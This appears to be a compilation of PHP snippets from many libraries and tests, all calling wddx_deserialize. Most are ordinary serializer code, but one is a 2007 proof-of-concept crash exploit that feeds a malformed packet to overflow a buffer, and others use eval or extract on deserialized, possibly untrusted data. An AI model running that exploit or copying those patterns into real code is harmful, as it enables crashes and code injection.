public function sessionData($key)
{
$data = $this->_store->get($key);
$data = wddx_deserialize($data);
$data['ttl'] = $this->_store->ttl($key);
return $data;
}
/**
* @param string $value
* @return array
*/
public function unserialize($value, $defaultValue = array())
{
if (!empty($value)) {
return wddx_deserialize($value);
}
return $defaultValue;
}
/**
* load configuration from a file
*
* @access public
* @param string $configFile full path of the config file
* @param array $options various options, depending on the reader
* @return array $config complete configuration
*/
function loadConfigFile($configFile, $options = array())
{
if (!function_exists("wddx_add_vars")) {
return patErrorManager::raiseError(PATCONFIGURATION_ERROR_DRIVER_NOT_WORKING, "WDDX extension is not installed on your system.");
}
$fp = @fopen($configFile, "r");
$wddx = fread($fp, filesize($configFile));
$conf = wddx_deserialize($wddx);
if ($conf === NULL) {
return patErrorManager::raiseError(PATCONFIGURATION_ERROR_CONFIG_INVALID, "{$configFile} is no valid WDDX file.");
}
return array("config" => $conf, "externalFiles" => array(), "cacheAble" => true);
}
function parse_response($data)
{
// skip HTTP header
$data = ltrim(strstr($data, "\r\n\r\n"));
$vars = wddx_deserialize($data);
if ($vars['login'] === TRUE) {
return TRUE;
} else {
// uh oh, hackers
printf("ERROR #%d: %s<br />\n", $vars['error'], $vars['error_str']);
return FALSE;
}
}
public function unserialize($v)
{
if ($v === NULL) {
return NULL;
}
if (!is_scalar($v)) {
return $v;
}
if ($this->len < 1) {
return wddx_deserialize($v);
}
if (substr($v, 0, $this->len) != $this->prefix) {
return $v;
}
return wddx_deserialize(substr($v, $this->len));
}
/**
* Unserialize from WDDX to PHP
*
* @param string $wddx
* @param array $opts
* @return mixed
* @throws RuntimeException on wddx error
*/
public function unserialize($wddx, array $opts = array())
{
$ret = wddx_deserialize($wddx);
if ($ret === null && class_exists('SimpleXMLElement', false)) {
// check if the returned NULL is valid
// or based on an invalid wddx string
try {
$simpleXml = new \SimpleXMLElement($wddx);
if (isset($simpleXml->data[0]->null[0])) {
return null;
// valid null
}
throw new RuntimeException('Invalid wddx');
} catch (\Exception $e) {
throw new RuntimeException($e->getMessage(), 0, $e);
}
}
return $ret;
}
/**
* Unserialize data.
*
* @param mixed $data The data to be unserialized.
* @param mixed $mode The mode of unserialization. Can be either a
* single mode or array of modes. If array, will be
* unserialized in the order provided.
* @param mixed $params Any additional parameters the unserialization
* method requires.
*
* @return mixed Unserialized data.
* @throws Horde_Serialize_Exception
*/
protected static function _unserialize(&$data, $mode, $params = null)
{
switch ($mode) {
case self::NONE:
break;
case self::RAW:
$data = rawurldecode($data);
break;
case self::URL:
$data = urldecode($data);
break;
case self::WDDX:
$data = wddx_deserialize($data);
break;
case self::BZIP:
// $params['small'] = Use bzip2 'small memory' mode?
$data = bzdecompress($data, isset($params['small']) ? $params['small'] : false);
break;
case self::IMAP8:
$data = quoted_printable_decode($data);
break;
case self::IMAPUTF7:
$data = Horde_String::convertCharset(Horde_Imap_Client_Utf7imap::Utf7ImapToUtf8($data), 'UTF-8', 'ISO-8859-1');
break;
case self::IMAPUTF8:
$data = Horde_Mime::encode($data);
break;
case self::BASIC:
$data2 = @unserialize($data);
// Unserialize can return false both on error and if $data is the
// false value.
if ($data2 === false && $data == serialize(false)) {
return $data2;
}
$data = $data2;
break;
case self::GZ_DEFLATE:
$data = gzinflate($data);
break;
case self::BASE64:
$data = base64_decode($data);
break;
case self::GZ_COMPRESS:
$data = gzuncompress($data);
break;
// $params = Output character set
// $params = Output character set
case self::UTF7:
$data = Horde_String::convertCharset($data, 'utf-7', $params);
break;
// $params = Output character set
// $params = Output character set
case self::UTF7_BASIC:
$data = self::unserialize($data, array(self::BASIC, self::UTF7), $params);
break;
case self::JSON:
$out = json_decode($data);
if (!is_null($out) || strcasecmp($data, 'null') === 0) {
return $out;
}
break;
case self::LZF:
$data = @lzf_decompress($data);
break;
}
if ($data === false) {
throw new Horde_Serialize_Exception('Unserialization failed.');
}
return $data;
}
/**
* Unserialize from WDDX to PHP
*
* @param string $wddx
* @param array $opts
* @return mixed
* @throws Zend_Serializer_Exception on wddx error
*/
public function unserialize($wddx, array $opts = array())
{
$ret = wddx_deserialize($wddx);
if ($ret === null) {
// check if the returned NULL is valid
// or based on an invalid wddx string
try {
$oldLibxmlDisableEntityLoader = libxml_disable_entity_loader(true);
$dom = new DOMDocument();
$dom->loadXML($wddx);
foreach ($dom->childNodes as $child) {
if ($child->nodeType === XML_DOCUMENT_TYPE_NODE) {
#require_once 'Zend/Serializer/Exception.php';
throw new Zend_Serializer_Exception('Invalid XML: Detected use of illegal DOCTYPE');
}
}
$simpleXml = simplexml_import_dom($dom);
libxml_disable_entity_loader($oldLibxmlDisableEntityLoader);
if (isset($simpleXml->data[0]->null[0])) {
return null;
// valid null
}
$errMsg = 'Can\'t unserialize wddx string';
} catch (Exception $e) {
$errMsg = $e->getMessage();
}
#require_once 'Zend/Serializer/Exception.php';
throw new Zend_Serializer_Exception($errMsg);
}
return $ret;
}
<?php
// Our assoc array
$talk = array('id' => 4, 'title' => 'Dynamic Images in PHP - How and When to Use Them', 'date' => '2002-04-29', 'speaker' => 'Alison Gianotto', 'url' => 'http://www.sdphp.net/talks/ag_image');
// we can serialize the value and
// create the packet in one step
$ser1 = wddx_serialize_vars('talk');
echo format_packet($ser1, 'In one step');
// or we could serialize it in several steps
$packet = wddx_packet_start("One of Alison's talks at SDPHP");
wddx_add_vars($packet, 'talk');
$ser2 = wddx_packet_end($packet);
echo format_packet($ser2, 'Making the packet by hand');
// now let's deserialize the packet
$vars = wddx_deserialize($ser2);
echo "<pre>\n<small>\n";
print_r($vars);
echo "</small>\n</pre>\n";
function format_packet($pckt, $title = 'wddx packet')
{
$re = '/^[^<]/';
$pckt = str_replace('>', ">\n", $pckt);
$t = explode("\n", $pckt);
$s = "[ {$title} ]<br>\n<pre>\n";
foreach ($t as $line) {
if (trim($line) == '') {
continue;
} elseif (preg_match($re, $line)) {
$tmp = explode("\n", str_replace('<', "\n<", $line));
$s .= ' <span style="color: blue;">' . $tmp[0] . "</span>\n" . htmlspecialchars($tmp[1]) . "\n";
} else {
/**
* Unserialize from WDDX to PHP
*
* @param string $wddx
* @return mixed
* @throws Exception\RuntimeException on wddx error
*/
public function unserialize($wddx)
{
$ret = wddx_deserialize($wddx);
if ($ret === null && class_exists('SimpleXMLElement', false)) {
// check if the returned NULL is valid
// or based on an invalid wddx string
try {
libxml_disable_entity_loader(true);
$simpleXml = new \SimpleXMLElement($wddx);
libxml_disable_entity_loader(false);
if (isset($simpleXml->data[0]->null[0])) {
return null;
// valid null
}
throw new Exception\RuntimeException('Unserialization failed: Invalid wddx packet');
} catch (\Exception $e) {
throw new Exception\RuntimeException('Unserialization failed: ' . $e->getMessage(), 0, $e);
}
}
return $ret;
}
/**
* Unserialize from WDDX to PHP
*
* @param string $wddx
* @param array $opts
* @return mixed
* @throws Zend_Serializer_Exception on wddx error
*/
public function unserialize($wddx, array $opts = array())
{
$ret = wddx_deserialize($wddx);
if ($ret === null) {
// check if the returned NULL is valid
// or based on an invalid wddx string
try {
$simpleXml = new SimpleXMLElement($wddx);
if (isset($simpleXml->data[0]->null[0])) {
return null;
// valid null
}
$errMsg = 'Can\'t unserialize wddx string';
} catch (Exception $e) {
$errMsg = $e->getMessage();
}
//$1 'Zend/Serializer/Exception.php';
throw new Zend_Serializer_Exception($errMsg);
}
return $ret;
}
function _wddx_decode($data)
{
return wddx_deserialize($data);
}
<var name="113301888545229100"> <struct> <var name="max"> <number>10</number> </var> <var name="cache"> <number>4</number> </var> <var name="order"> <struct> <var name="content_113300831086270200"> <struct> <var name="CMS_BUILD"> <string>desc</string> </var> </struct> </var> </struct> </var> </struct> </var> </struct> </var> </struct> </var> </struct> </data> </wddxpacket> WDX; var_dump(wddx_deserialize($wddx));
<?php $message = "<wddxPacket version='1.0'><header><comment>my_command</comment></header><data><struct><var name='handle'><number></number></var></struct></data></wddxPacket>"; print_r(wddx_deserialize($message)); print_r(wddx_deserialize($message));
<?php
// Sample REST server - returns uptime information
// Jesus M. Castagnetto
//$host = 'www.example.com';
//$port = 80;
//$serverPath = '/xmlrpc/server.php'
$host = 'jmc.sdsc.edu';
$port = 6666;
$serverPath = '/misc/ws_rest_sample_server.php';
$packet = file_get_contents("http://{$host}:{$port}{$serverPath}");
$tmp = wddx_deserialize($packet);
extract($tmp);
$sep = str_repeat('*', 50);
echo <<<_END
{$sep}
Uptime for : {$host}
Timestamp (UTC) : {$timestamp}
Local time at host : {$uptime['time']}
Host has run for : {$uptime['duration']}
Number of current users : {$uptime['users']}
Average number of jobs in queue
1 minute : {$uptime['load1']}
5 minutes : {$uptime['load5']}
15 minutes : {$uptime['load15']}
{$sep}
_END;
?>
protected function _removeUserMap($id)
{
$data = $this->_store->get($id);
if (!$data) {
return;
}
$decoded = wddx_deserialize($data);
if (!is_array($decoded)) {
return false;
}
$uid = Hash::get($decoded, AuthComponent::$sessionKey . '.id');
if (empty($uid)) {
return;
}
$usermap = $this->_userMapPrefix . ':' . $uid;
return $this->_store->del($usermap);
}
<?php
$path = dirname(__FILE__);
$fp = fopen("php://temp", 'w+');
fputs($fp, "<wddxPacket version='1.0'><header><comment>TEST comment</comment></header><data><struct><var name='var1'><null/></var><var name='var2'><string>some string</string></var><var name='var3'><number>756</number></var><var name='var4'><boolean value='true'/></var></struct></data></wddxPacket>");
rewind($fp);
var_dump(wddx_deserialize($fp));
fclose($fp);
<?php
for ($i = 65; $i < 256; $i++) {
if ($i >= 0xc0) {
$v = chr(0xc3) . chr($i - 64);
} elseif ($i >= 0x80) {
$v = chr(0xc2) . chr($i);
} else {
$v = chr($i);
// make it UTF-8
}
$ret = wddx_serialize_value($v);
echo $ret . "\n";
var_dump(bin2hex($v), bin2hex(wddx_deserialize($ret)), $v == wddx_deserialize($ret));
}
/**
* @param $raw
*
* @return mixed
*/
public function Decode($raw)
{
return \wddx_deserialize($raw);
}
<?php
// Based on MediaWiki's ApiFormatWddxTest
// The omitted data in the "b" variable previously caused a fatal error
var_dump(wddx_deserialize(<<<EOT
<wddxPacket version="1.0">
<header/>
<data>
<struct>
<var name="a">
<string>foo</string>
</var>
<var name="b"/>
</struct>
</data>
</wddxPacket>
EOT
));
<?php
////////////////////////////////////////////////////////////////////////
// _ _ _ _ ___ _ _ ___ //
// | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ \| || || _ \ //
// | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___|| _/| __ || _/ //
// |_||_|\__,_||_| \__,_|\___||_||_|\___|\__,_| |_| |_||_||_| //
// //
// Proof of concept code from the Hardened-PHP Project //
// (C) Copyright 2007 Stefan Esser //
// //
////////////////////////////////////////////////////////////////////////
// PHP - wddx_deserialize() Crash Exploit //
////////////////////////////////////////////////////////////////////////
// This is meant as a protection against remote file inclusion.
die("REMOVE THIS LINE");
// The following testcode will overflow the buffer with lots of C
wddx_deserialize("<wddxPacket version='1.0'><header/>\n <data>\n <array length='1'>\n <string>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<X />CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC</string>\n <string></string>\n </array>\n </data>\n </wddxPacket>");
?>
# milw0rm.com [2007-03-04]
<?php
$path = dirname(__FILE__);
var_dump(wddx_deserialize(file_get_contents("{$path}/wddx.xml")));
/**
* Unserialize from WDDX to PHP
*
* @param string $wddx
* @return mixed
* @throws Exception\RuntimeException on wddx error
* @throws Exception\InvalidArgumentException if invalid xml
*/
public function unserialize($wddx)
{
$ret = wddx_deserialize($wddx);
if ($ret === null && class_exists('SimpleXMLElement', false)) {
// check if the returned NULL is valid
// or based on an invalid wddx string
try {
$oldLibxmlDisableEntityLoader = libxml_disable_entity_loader(true);
$dom = new \DOMDocument();
$dom->loadXML($wddx);
foreach ($dom->childNodes as $child) {
if ($child->nodeType === XML_DOCUMENT_TYPE_NODE) {
throw new Exception\InvalidArgumentException('Invalid XML: Detected use of illegal DOCTYPE');
}
}
$simpleXml = simplexml_import_dom($dom);
//$simpleXml = new \SimpleXMLElement($wddx);
libxml_disable_entity_loader($oldLibxmlDisableEntityLoader);
if (isset($simpleXml->data[0]->null[0])) {
return null;
// valid null
}
throw new Exception\RuntimeException('Unserialization failed: Invalid wddx packet');
} catch (\Exception $e) {
throw new Exception\RuntimeException('Unserialization failed: ' . $e->getMessage(), 0, $e);
}
}
return $ret;
}
/**
* Write the session data
*
* @param string $id Session ID
* @param string $sessionData Serialized Session Data
*
* @return boolean
*/
public function write($id, $sessionData)
{
if ($this->_settings['json'] === true) {
$sessionData = json_encode(wddx_deserialize($sessionData));
}
$data = array('data' => $sessionData, 'atime' => time());
$this->_session($id)->setData($data);
return $this->_session($id)->store() instanceof RiakObject;
}
/**
* WDDX中文反解函数
* flash中wddx编码中文传值给php后中文自动解码,php就无法正常解wddx包,为了正常传输wddx封包中文,则中文必须用[wddx]标签包括,例如[wddx]urlencode(中文)[/wddx],
* 此函数调用了ubbcode,将封包中的中文编码后,正常解包,然后再将数组中编码的中文解码
* @author 肖飞
* @param string $strWDDX 请求wddx字符串
* @param array $arrKey 需要中文解码的变量数组
* @return array
*/
public function WDDXdecode($strWDDX)
{
$objUbbcode = new ubbcode();
$strWDDX = stripslashes(nl2br($strWDDX));
if (count($objUbbcode->ubbParameter($strWDDX))) {
$arrData = wddx_deserialize($strWDDX);
$strData = var_export($arrData, true);
$strData = $objUbbcode->parse($strData);
eval("\$arrData = {$strData};");
} else {
$strWDDX = $objUbbcode->parse($strWDDX);
$arrData = wddx_deserialize($strWDDX);
}
return $arrData;
}
<?php
$data = array('01' => 'Zero', '+1' => 'Plus sign', ' 1' => 'Space');
var_dump(wddx_deserialize(wddx_serialize_vars('data')));
/**
* @requires function wddx_deserialize
*/
public function testValidSyntax()
{
$data = $this->apiRequest('wddx', array('action' => 'query', 'meta' => 'siteinfo'));
$this->assertInternalType('array', wddx_deserialize($data));
$this->assertGreaterThan(0, count((array) $data));
}
/**
* @param string $encoded
*
* @return mixed
*/
public function decode(string $encoded)
{
return wddx_deserialize($encoded);
}
/**
* Unpacks a raw string as created by _packSchema into an array
* structure for use as $this->_schema
*
* @access private
* @param string $rawFieldString data to be unpacked into the schema
* @return array
*/
function _unpackSchema($rawSchema)
{
if ($rawSchema[0] == 'a') {
$schema = unserialize($rawSchema);
} elseif ($rawSchema[0] == '<') {
if (!function_exists('wddx_deserialize')) {
return $this->raiseError('wddx extension not found!');
}
$schema = wddx_deserialize($rawSchema);
} else {
return $this->raiseError('Unknown schema format');
}
$primaryKey = array();
foreach ($schema as $name => $meta) {
if (isset($meta['primary_key'])) {
$primaryKey[$name] = true;
}
}
if (sizeof($primaryKey)) {
$this->_primaryKey = $primaryKey;
} else {
$this->_primaryKey = array('_rowid' => true);
}
return $schema;
}
<pre>
<?php
$path = dirname(__FILE__);
$data = file_get_contents("{$path}/wddx_packet.xml");
$result = wddx_deserialize($data);
print_r($result);
?>
</pre>
